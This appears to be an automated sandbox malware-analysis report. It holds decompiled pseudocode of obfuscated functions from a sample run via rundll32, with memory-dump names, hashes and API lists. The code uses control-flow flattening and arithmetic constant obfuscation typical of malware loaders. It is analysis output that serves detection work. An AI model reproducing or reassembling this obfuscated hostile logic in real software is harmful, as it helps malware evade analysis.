                                                                                                                                    				_t192 = 0x23;
                                                                                                                                    				_v24 = _v24 / _t192;
                                                                                                                                    				_v24 = _v24 ^ 0x00019ec3;
                                                                                                                                    				_v72 = 0x274d3f;
                                                                                                                                    				_v72 = _v72 + 0x3236;
                                                                                                                                    				_v72 = _v72 + 0x71a1;
                                                                                                                                    				_v72 = _v72 + 0x1749;
                                                                                                                                    				_v72 = _v72 ^ 0x0028bc49;
                                                                                                                                    				_v32 = 0x96c762;
                                                                                                                                    				_t193 = 0x44;
                                                                                                                                    				_v32 = _v32 / _t193;
                                                                                                                                    				_v32 = _v32 ^ 0x000b5918;
                                                                                                                                    				_v76 = 0x2f082c;
                                                                                                                                    				_v76 = _v76 + 0x52f3;
                                                                                                                                    				_v76 = _v76 + 0x7ae4;
                                                                                                                                    				_v76 = _v76 ^ 0x81d2744f;
                                                                                                                                    				_v76 = _v76 ^ 0x81f68fa5;
                                                                                                                                    				_v36 = 0x9357ce;
                                                                                                                                    				_v36 = _v36 + 0xfffffb26;
                                                                                                                                    				_v36 = _v36 ^ 0x009b03e6;
                                                                                                                                    				do {
                                                                                                                                    					while(_t196 != 0x4d42949) {
                                                                                                                                    						if(_t196 == 0x5adc597) {
                                                                                                                                    							_t196 = 0x4d42949;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t196 == 0x78e32ab) {
                                                                                                                                    								E002D847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
                                                                                                                                    							} else {
                                                                                                                                    								if(_t196 != 0xf2775cd) {
                                                                                                                                    									goto L11;
                                                                                                                                    								} else {
                                                                                                                                    									_push(_t196);
                                                                                                                                    									_push(_t196);
                                                                                                                                    									_t214 = E002C7FF2(_v20 + _v20);
                                                                                                                                    									if(_t214 != 0) {
                                                                                                                                    										_t196 = 0x78e32ab;
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L14:
                                                                                                                                    						return _t214;
                                                                                                                                    					}
                                                                                                                                    					_t179 = E002D847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
                                                                                                                                    					_t217 =  &(_t217[8]);
                                                                                                                                    					if(_t179 == 0) {
                                                                                                                                    						_t196 = 0xc32537b;
                                                                                                                                    						goto L11;
                                                                                                                                    					} else {
                                                                                                                                    						_t196 = 0xf2775cd;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					goto L14;
                                                                                                                                    					L11:
                                                                                                                                    				} while (_t196 != 0xc32537b);
                                                                                                                                    				goto L14;
                                                                                                                                    			}



































                                                                                                                                    0x002c4b10
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4b06
                                                                                                                                    0x002c4b06
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4b06
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4b15
                                                                                                                                    0x002c4b15
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: -e$62$?M'$h\c$z
                                                                                                                                    • API String ID: 0-1842174784
                                                                                                                                    • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                    • Instruction ID: e0d8a07c194743945054be049672d304be3f7c8b54c72e45e9b7c574d97795d8
                                                                                                                                    • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                    • Instruction Fuzzy Hash: C3812F715193819FD368CF61C99991FBBF1FBD9758F408A0CF29586260D3B6CA188F42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002DBE27(intOrPtr* __ecx) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				char _v320;
                                                                                                                                    				char _t133;
                                                                                                                                    				signed int _t136;
                                                                                                                                    				void* _t139;
                                                                                                                                    				signed int _t141;
                                                                                                                                    				signed int _t142;
                                                                                                                                    				signed int _t143;
                                                                                                                                    				char* _t144;
                                                                                                                                    				intOrPtr* _t163;
                                                                                                                                    				void* _t164;
                                                                                                                                    
                                                                                                                                    				_v40 = 0x365269;
                                                                                                                                    				_v40 = _v40 >> 7;
                                                                                                                                    				_v40 = _v40 ^ 0x00099806;
                                                                                                                                    				_v16 = 0x620947;
                                                                                                                                    				_v16 = _v16 + 0x25da;
                                                                                                                                    				_v16 = _v16 | 0xf0dff1a3;
                                                                                                                                    				_v16 = _v16 + 0xffff8fd5;
                                                                                                                                    				_v16 = _v16 ^ 0xf0f65193;
                                                                                                                                    				_v60 = 0x4a6911;
                                                                                                                                    				_v60 = _v60 >> 2;
                                                                                                                                    				_v60 = _v60 ^ 0x0015bfec;
                                                                                                                                    				_v32 = 0xee641f;
                                                                                                                                    				_v32 = _v32 ^ 0x54466854;
                                                                                                                                    				_v32 = _v32 ^ 0x51df3278;
                                                                                                                                    				_v32 = _v32 ^ 0x057124b2;
                                                                                                                                    				_v36 = 0x2245a1;
                                                                                                                                    				_t163 = __ecx;
                                                                                                                                    				_t141 = 0x59;
                                                                                                                                    				_v36 = _v36 / _t141;
                                                                                                                                    				_t142 = 0x7c;
                                                                                                                                    				_v36 = _v36 / _t142;
                                                                                                                                    				_v36 = _v36 ^ 0x00022b59;
                                                                                                                                    				_v52 = 0x17e728;
                                                                                                                                    				_v52 = _v52 << 7;
                                                                                                                                    				_v52 = _v52 ^ 0x0bfefc33;
                                                                                                                                    				_v24 = 0x5a7c12;
                                                                                                                                    				_v24 = _v24 + 0xffff6a30;
                                                                                                                                    				_v24 = _v24 + 0xb9bd;
                                                                                                                                    				_v24 = _v24 ^ 0x00522d4c;
                                                                                                                                    				_v8 = 0x70b293;
                                                                                                                                    				_v8 = _v8 ^ 0xb7f64013;
                                                                                                                                    				_v8 = _v8 | 0x98950303;
                                                                                                                                    				_v8 = _v8 << 0x10;
                                                                                                                                    				_v8 = _v8 ^ 0xf38d6f21;
                                                                                                                                    				_v28 = 0x5e48e6;
                                                                                                                                    				_v28 = _v28 >> 2;
                                                                                                                                    				_v28 = _v28 << 0xf;
                                                                                                                                    				_v28 = _v28 ^ 0xc917f664;
                                                                                                                                    				_v44 = 0xd34be4;
                                                                                                                                    				_v44 = _v44 ^ 0x1af04c78;
                                                                                                                                    				_v44 = _v44 ^ 0x1a25cf5b;
                                                                                                                                    				_v56 = 0x13a2c8;
                                                                                                                                    				_v56 = _v56 ^ 0x00107e6c;
                                                                                                                                    				_v20 = 0x6acc1;
                                                                                                                                    				_t143 = 0x48;
                                                                                                                                    				_v20 = _v20 * 0x75;
                                                                                                                                    				_v20 = _v20 | 0x5ce04716;
                                                                                                                                    				_v20 = _v20 ^ 0xfe39b07b;
                                                                                                                                    				_v20 = _v20 ^ 0xa1d6ae77;
                                                                                                                                    				_v48 = 0x9d30cb;
                                                                                                                                    				_t144 =  &_v320;
                                                                                                                                    				_v48 = _v48 / _t143;
                                                                                                                                    				_v48 = _v48 ^ 0x00028c5d;
                                                                                                                                    				_v12 = 0x456efe;
                                                                                                                                    				_v12 = _v12 + 0xffff4082;
                                                                                                                                    				_v12 = _v12 >> 1;
                                                                                                                                    				_v12 = _v12 ^ 0xdbb5e427;
                                                                                                                                    				_v12 = _v12 ^ 0xdb99f5c8;
                                                                                                                                    				while(1) {
                                                                                                                                    					_t133 =  *_t163;
                                                                                                                                    					if(_t133 == 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					if(_t133 == 0x2e) {
                                                                                                                                    						 *_t144 = 0;
                                                                                                                                    					} else {
                                                                                                                                    						 *_t144 = _t133;
                                                                                                                                    						_t144 = _t144 + 1;
                                                                                                                                    						_t163 = _t163 + 1;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					L6:
                                                                                                                                    					_t164 = E002CADE6(_v40, _v16,  &_v320, _v60);
                                                                                                                                    					if(_t164 != 0) {
                                                                                                                                    						L8:
                                                                                                                                    						_t136 = E002DDBEA(_t163 + 1, _v8, _v28, _v44);
                                                                                                                                    						_push(_v12);
                                                                                                                                    						_push(_t136 ^ 0x2ac2611c);
                                                                                                                                    						_push(_v48);
                                                                                                                                    						_push(_t164);
                                                                                                                                    						return E002CCDCD(_v56, _v20);
                                                                                                                                    					}
                                                                                                                                    					_t139 = E002DCADF(_v32,  &_v320, _v36, _v52);
                                                                                                                                    					_t164 = _t139;
                                                                                                                                    					if(_t164 != 0) {
                                                                                                                                    						goto L8;
                                                                                                                                    					}
                                                                                                                                    					return _t139;
                                                                                                                                    				}
                                                                                                                                    				goto L6;
                                                                                                                                    			}



























                                                                                                                                    0x002dbfb3
                                                                                                                                    0x002dbfc1
                                                                                                                                    0x002dbfb5
                                                                                                                                    0x002dbfb5
                                                                                                                                    0x002dbfb7
                                                                                                                                    0x002dbfb8
                                                                                                                                    0x00000000
                                                                                                                                    0x002dbfb8
                                                                                                                                    0x002dbfc4
                                                                                                                                    0x002dbfd9
                                                                                                                                    0x002dbfdf
                                                                                                                                    0x002dbffd
                                                                                                                                    0x002dc00c
                                                                                                                                    0x002dc011
                                                                                                                                    0x002dc019
                                                                                                                                    0x002dc01a
                                                                                                                                    0x002dc023
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc029
                                                                                                                                    0x002dbff0
                                                                                                                                    0x002dbff5
                                                                                                                                    0x002dbffb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc031
                                                                                                                                    0x002dc031
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                                    • API String ID: 0-1567385930
                                                                                                                                    • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                    • Instruction ID: 19f11f9432f4d6ac1cf57e3e6ceae0ab8521adf61fdb50e55e73cf105c12f722
                                                                                                                                    • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                    • Instruction Fuzzy Hash: 06513371C05219EBDF15CFA4D94A8EEFBB1FF04314F20815AE41276260C7B51A55CF94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                    • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                                    • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                                    • SendMessageA.USER32 ref: 1001B48B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: State$LongMessageSendWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1063413437-0
                                                                                                                                    • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                    • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                                    • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                    • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E002D20BA() {
                                                                                                                                    				char _v520;
                                                                                                                                    				signed int _v524;
                                                                                                                                    				unsigned int _v528;
                                                                                                                                    				signed int _v532;
                                                                                                                                    				signed int _v536;
                                                                                                                                    				signed int _v540;
                                                                                                                                    				signed int _v544;
                                                                                                                                    				signed int _v548;
                                                                                                                                    				signed int _v552;
                                                                                                                                    				signed int _v556;
                                                                                                                                    				signed int _v560;
                                                                                                                                    				signed int _v564;
                                                                                                                                    				signed int _v568;
                                                                                                                                    				signed int _v572;
                                                                                                                                    				signed int _v576;
                                                                                                                                    				signed int _v580;
                                                                                                                                    				signed int _v584;
                                                                                                                                    				signed int _v588;
                                                                                                                                    				signed int _v592;
                                                                                                                                    				signed int _v596;
                                                                                                                                    				signed int _v600;
                                                                                                                                    				signed int _v604;
                                                                                                                                    				signed int _v608;
                                                                                                                                    				signed int _v612;
                                                                                                                                    				signed int _v616;
                                                                                                                                    				signed int _v620;
                                                                                                                                    				signed int _v624;
                                                                                                                                    				signed int _t227;
                                                                                                                                    				intOrPtr _t228;
                                                                                                                                    				signed int _t230;
                                                                                                                                    				void* _t231;
                                                                                                                                    				intOrPtr _t235;
                                                                                                                                    				intOrPtr _t245;
                                                                                                                                    				void* _t247;
                                                                                                                                    				intOrPtr _t254;
                                                                                                                                    				signed int _t272;
                                                                                                                                    				signed int _t273;
                                                                                                                                    				signed int _t274;
                                                                                                                                    				signed int _t275;
                                                                                                                                    				void* _t277;
                                                                                                                                    				signed int* _t279;
                                                                                                                                    				void* _t283;
                                                                                                                                    
                                                                                                                                    				_t279 =  &_v624;
                                                                                                                                    				_v612 = 0x15bebb;
                                                                                                                                    				_v612 = _v612 ^ 0x0c09d82a;
                                                                                                                                    				_t247 = 0x7e01d7;
                                                                                                                                    				_v612 = _v612 + 0xffff69e9;
                                                                                                                                    				_v612 = _v612 ^ 0xcffb1e8d;
                                                                                                                                    				_v612 = _v612 ^ 0xc3e0ceeb;
                                                                                                                                    				_v596 = 0xb5bc7f;
                                                                                                                                    				_v596 = _v596 << 0xa;
                                                                                                                                    				_v596 = _v596 + 0xbaa7;
                                                                                                                                    				_v596 = _v596 ^ 0xd6f2b68e;
                                                                                                                                    				_v600 = 0x5909af;
                                                                                                                                    				_v600 = _v600 ^ 0x0096463d;
                                                                                                                                    				_v600 = _v600 >> 3;
                                                                                                                                    				_v600 = _v600 ^ 0x0016e9cd;
                                                                                                                                    				_v548 = 0x801d18;
                                                                                                                                    				_v548 = _v548 + 0xffffc800;
                                                                                                                                    				_v548 = _v548 ^ 0x0070ca5a;
                                                                                                                                    				_v580 = 0x2361dd;
                                                                                                                                    				_v580 = _v580 * 0x6f;
                                                                                                                                    				_t277 = 0;
                                                                                                                                    				_v580 = _v580 << 0xe;
                                                                                                                                    				_v580 = _v580 ^ 0xdbb34e1e;
                                                                                                                                    				_v528 = 0x864281;
                                                                                                                                    				_v528 = _v528 >> 0xc;
                                                                                                                                    				_v528 = _v528 ^ 0x0000b217;
                                                                                                                                    				_v560 = 0x478502;
                                                                                                                                    				_v560 = _v560 | 0x3d47d1eb;
                                                                                                                                    				_v560 = _v560 ^ 0x3d4c1a49;
                                                                                                                                    				_v540 = 0x8f961f;
                                                                                                                                    				_v540 = _v540 >> 0xc;
                                                                                                                                    				_v540 = _v540 ^ 0x000d133d;
                                                                                                                                    				_v572 = 0xef4b2;
                                                                                                                                    				_v572 = _v572 << 0xd;
                                                                                                                                    				_v572 = _v572 + 0xffff85b1;
                                                                                                                                    				_v572 = _v572 ^ 0xde949f86;
                                                                                                                                    				_v608 = 0x8e969a;
                                                                                                                                    				_v608 = _v608 << 0xd;
                                                                                                                                    				_t272 = 0x21;
                                                                                                                                    				_v608 = _v608 / _t272;
                                                                                                                                    				_t273 = 0x2f;
                                                                                                                                    				_v608 = _v608 / _t273;
                                                                                                                                    				_v608 = _v608 ^ 0x002a10b8;
                                                                                                                                    				_v620 = 0x864bbd;
                                                                                                                                    				_v620 = _v620 << 0x10;
                                                                                                                                    				_v620 = _v620 + 0x87ba;
                                                                                                                                    				_v620 = _v620 + 0x936f;
                                                                                                                                    				_v620 = _v620 ^ 0x4bb78bcc;
                                                                                                                                    				_v564 = 0xfb8a17;
                                                                                                                                    				_t274 = 0x62;
                                                                                                                                    				_v564 = _v564 * 0x63;
                                                                                                                                    				_v564 = _v564 ^ 0x61429d97;
                                                                                                                                    				_v576 = 0x222f;
                                                                                                                                    				_v576 = _v576 >> 4;
                                                                                                                                    				_v576 = _v576 ^ 0xf39884cf;
                                                                                                                                    				_v576 = _v576 ^ 0xf39d4647;
                                                                                                                                    				_v556 = 0x6068cb;
                                                                                                                                    				_v556 = _v556 ^ 0xfe1a734d;
                                                                                                                                    				_v556 = _v556 ^ 0xfe79d9b4;
                                                                                                                                    				_v616 = 0xc46e23;
                                                                                                                                    				_v616 = _v616 >> 2;
                                                                                                                                    				_v616 = _v616 / _t274;
                                                                                                                                    				_v616 = _v616 * 0x76;
                                                                                                                                    				_v616 = _v616 ^ 0x003e2a5a;
                                                                                                                                    				_v624 = 0x4617e4;
                                                                                                                                    				_v624 = _v624 + 0xffff4d74;
                                                                                                                                    				_v624 = _v624 ^ 0x9dcdfd87;
                                                                                                                                    				_v624 = _v624 + 0x3fd8;
                                                                                                                                    				_v624 = _v624 ^ 0x9d89a5c2;
                                                                                                                                    				_v588 = 0x3a0167;
                                                                                                                                    				_v588 = _v588 << 1;
                                                                                                                                    				_v588 = _v588 + 0xffff1a51;
                                                                                                                                    				_v588 = _v588 ^ 0x00728a40;
                                                                                                                                    				_v532 = 0x3a363e;
                                                                                                                                    				_v532 = _v532 ^ 0xe52a74a2;
                                                                                                                                    				_v532 = _v532 ^ 0xe514694b;
                                                                                                                                    				_v544 = 0x52d5cb;
                                                                                                                                    				_v544 = _v544 | 0x185d0a08;
                                                                                                                                    				_v544 = _v544 ^ 0x18524fe5;
                                                                                                                                    				_v584 = 0x37b3aa;
                                                                                                                                    				_v584 = _v584 + 0xebef;
                                                                                                                                    				_t275 = 0x72;
                                                                                                                                    				_v584 = _v584 * 0x28;
                                                                                                                                    				_v584 = _v584 ^ 0x08d0b087;
                                                                                                                                    				_v592 = 0xa4bebe;
                                                                                                                                    				_v592 = _v592 >> 8;
                                                                                                                                    				_v592 = _v592 | 0x739fbd45;
                                                                                                                                    				_v592 = _v592 ^ 0x739593e3;
                                                                                                                                    				_v552 = 0x17b1c;
                                                                                                                                    				_v552 = _v552 << 0xe;
                                                                                                                                    				_v552 = _v552 ^ 0x5ecd7403;
                                                                                                                                    				_v568 = 0x403d75;
                                                                                                                                    				_v568 = _v568 >> 3;
                                                                                                                                    				_v568 = _v568 | 0x80b15bc0;
                                                                                                                                    				_v568 = _v568 ^ 0x80b9a416;
                                                                                                                                    				_v536 = 0x2ed64e;
                                                                                                                                    				_t276 = _v524;
                                                                                                                                    				_v536 = _v536 / _t275;
                                                                                                                                    				_v536 = _v536 ^ 0x00033d67;
                                                                                                                                    				_v604 = 0x8b403d;
                                                                                                                                    				_v604 = _v604 + 0xffff3866;
                                                                                                                                    				_v604 = _v604 << 8;
                                                                                                                                    				_v604 = _v604 ^ 0x8a7a6cd3;
                                                                                                                                    				goto L1;
                                                                                                                                    				do {
                                                                                                                                    					while(1) {
                                                                                                                                    						L1:
                                                                                                                                    						_t283 = _t247 - 0x73dad95;
                                                                                                                                    						if(_t283 > 0) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    						if(_t283 == 0) {
                                                                                                                                    							E002DDA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
                                                                                                                                    							_t235 = E002C2051(_v536,  &_v520, _v604);
                                                                                                                                    							_t254 =  *0x2e3e10; // 0x0
                                                                                                                                    							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t247 == 0x7e01d7) {
                                                                                                                                    								_push(_t247);
                                                                                                                                    								_push(_t247);
                                                                                                                                    								 *0x2e3e10 = E002C7FF2(0x45c);
                                                                                                                                    								_t247 = 0x8643fcd;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t247 == 0xd34913) {
                                                                                                                                    									_t247 = 0x148c4fa;
                                                                                                                                    									_v524 = _v596;
                                                                                                                                    									continue;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t247 == 0xfeb697) {
                                                                                                                                    										_v524 = _v612;
                                                                                                                                    										goto L8;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t247 != 0x148c4fa) {
                                                                                                                                    											goto L20;
                                                                                                                                    										} else {
                                                                                                                                    											E002D8F9E(_v620, _v564, _v576, _v556, _t276);
                                                                                                                                    											_t279 =  &(_t279[3]);
                                                                                                                                    											L8:
                                                                                                                                    											_t247 = 0xac90332;
                                                                                                                                    											continue;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L23:
                                                                                                                                    						return _t277;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t247 - 0x8643fcd;
                                                                                                                                    					if(_t247 == 0x8643fcd) {
                                                                                                                                    						_t227 = E002C912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
                                                                                                                                    						_t276 = _t227;
                                                                                                                                    						_t279 =  &(_t279[5]);
                                                                                                                                    						__eflags = _t227;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							_t247 = 0xfeb697;
                                                                                                                                    							goto L20;
                                                                                                                                    						} else {
                                                                                                                                    							_t245 =  *0x2e3e10; // 0x0
                                                                                                                                    							 *((intOrPtr*)(_t245 + 0x450)) = 1;
                                                                                                                                    							_t247 = 0xd34913;
                                                                                                                                    							goto L1;
                                                                                                                                    						}
                                                                                                                                    					} else {
                                                                                                                                    						__eflags = _t247 - 0xac90332;
                                                                                                                                    						if(_t247 == 0xac90332) {
                                                                                                                                    							_push(_v532);
                                                                                                                                    							_push(_v524);
                                                                                                                                    							_push(_v588);
                                                                                                                                    							_t228 =  *0x2e3e10; // 0x0
                                                                                                                                    							_push(_t228 + 0x23c);
                                                                                                                                    							_t230 = E002D46BB(_v616, _v624);
                                                                                                                                    							_t279 = _t279 - 0xc + 0x1c;
                                                                                                                                    							_t247 = 0xe2d9513;
                                                                                                                                    							__eflags = _t230;
                                                                                                                                    							_t231 = 1;
                                                                                                                                    							_t277 =  ==  ? _t231 : _t277;
                                                                                                                                    							goto L1;
                                                                                                                                    						} else {
                                                                                                                                    							__eflags = _t247 - 0xe2d9513;
                                                                                                                                    							if(_t247 != 0xe2d9513) {
                                                                                                                                    								goto L20;
                                                                                                                                    							} else {
                                                                                                                                    								E002CA55F();
                                                                                                                                    								_t247 = 0x73dad95;
                                                                                                                                    								goto L1;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					goto L23;
                                                                                                                                    					L20:
                                                                                                                                    					__eflags = _t247 - 0x13a2d4a;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L23;
                                                                                                                                    			}













































                                                                                                                                    0x002d23a6
                                                                                                                                    0x002d23ae
                                                                                                                                    0x002d23b6
                                                                                                                                    0x002d23bb
                                                                                                                                    0x002d23bb
                                                                                                                                    0x002d23c3
                                                                                                                                    0x002d23c3
                                                                                                                                    0x002d23c3
                                                                                                                                    0x002d23c3
                                                                                                                                    0x002d23c5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d23cb
                                                                                                                                    0x002d2519
                                                                                                                                    0x002d2532
                                                                                                                                    0x002d2537
                                                                                                                                    0x002d2540
                                                                                                                                    0x002d23d1
                                                                                                                                    0x002d23d7
                                                                                                                                    0x002d243c
                                                                                                                                    0x002d243d
                                                                                                                                    0x002d2445
                                                                                                                                    0x002d244a
                                                                                                                                    0x00000000
                                                                                                                                    0x002d23d9
                                                                                                                                    0x002d23df
                                                                                                                                    0x002d2420
                                                                                                                                    0x002d2425
                                                                                                                                    0x00000000
                                                                                                                                    0x002d23e1
                                                                                                                                    0x002d23e7
                                                                                                                                    0x002d2416
                                                                                                                                    0x00000000
                                                                                                                                    0x002d23e9
                                                                                                                                    0x002d23ef
                                                                                                                                    0x00000000
                                                                                                                                    0x002d23f5
                                                                                                                                    0x002d2406
                                                                                                                                    0x002d240b
                                                                                                                                    0x002d240e
                                                                                                                                    0x002d240e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d240e
                                                                                                                                    0x002d23ef
                                                                                                                                    0x002d23e7
                                                                                                                                    0x002d23df
                                                                                                                                    0x002d23d7
                                                                                                                                    0x002d2544
                                                                                                                                    0x002d254f
                                                                                                                                    0x002d254f
                                                                                                                                    0x002d2454
                                                                                                                                    0x002d245a
                                                                                                                                    0x002d24ca
                                                                                                                                    0x002d24cf
                                                                                                                                    0x002d24d1
                                                                                                                                    0x002d24d4
                                                                                                                                    0x002d24d6
                                                                                                                                    0x002d24f0
                                                                                                                                    0x00000000
                                                                                                                                    0x002d24d8
                                                                                                                                    0x002d24d8
                                                                                                                                    0x002d24e0
                                                                                                                                    0x002d24e6
                                                                                                                                    0x00000000
                                                                                                                                    0x002d24e6
                                                                                                                                    0x002d245c
                                                                                                                                    0x002d245c
                                                                                                                                    0x002d245e
                                                                                                                                    0x002d2478
                                                                                                                                    0x002d247c
                                                                                                                                    0x002d2480
                                                                                                                                    0x002d2484
                                                                                                                                    0x002d2499
                                                                                                                                    0x002d249a
                                                                                                                                    0x002d249f
                                                                                                                                    0x002d24a2
                                                                                                                                    0x002d24a7
                                                                                                                                    0x002d24ab
                                                                                                                                    0x002d24ac
                                                                                                                                    0x00000000
                                                                                                                                    0x002d2460
                                                                                                                                    0x002d2460
                                                                                                                                    0x002d2466
                                                                                                                                    0x00000000
                                                                                                                                    0x002d246c
                                                                                                                                    0x002d246c
                                                                                                                                    0x002d2471
                                                                                                                                    0x00000000
                                                                                                                                    0x002d2471
                                                                                                                                    0x002d2466
                                                                                                                                    0x002d245e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d24f5
                                                                                                                                    0x002d24f5
                                                                                                                                    0x002d24f5
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: /"$>6:$Z*>$u=@
                                                                                                                                    • API String ID: 0-89199335
                                                                                                                                    • Opcode ID: 484c194bc859773dced6db075a23b367170d6d2b60fbe1dd76b67ea8ea70192c
                                                                                                                                    • Instruction ID: 8d4dd6c82521eb620ecacd64a31d6346437c460fd1df2e194438100707dc83ac
                                                                                                                                    • Opcode Fuzzy Hash: 484c194bc859773dced6db075a23b367170d6d2b60fbe1dd76b67ea8ea70192c
                                                                                                                                    • Instruction Fuzzy Hash: 50B10171118381DFC358CF65C48A81BBBE1FBD4748F209A1EF6A286261D3B5C959CF92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

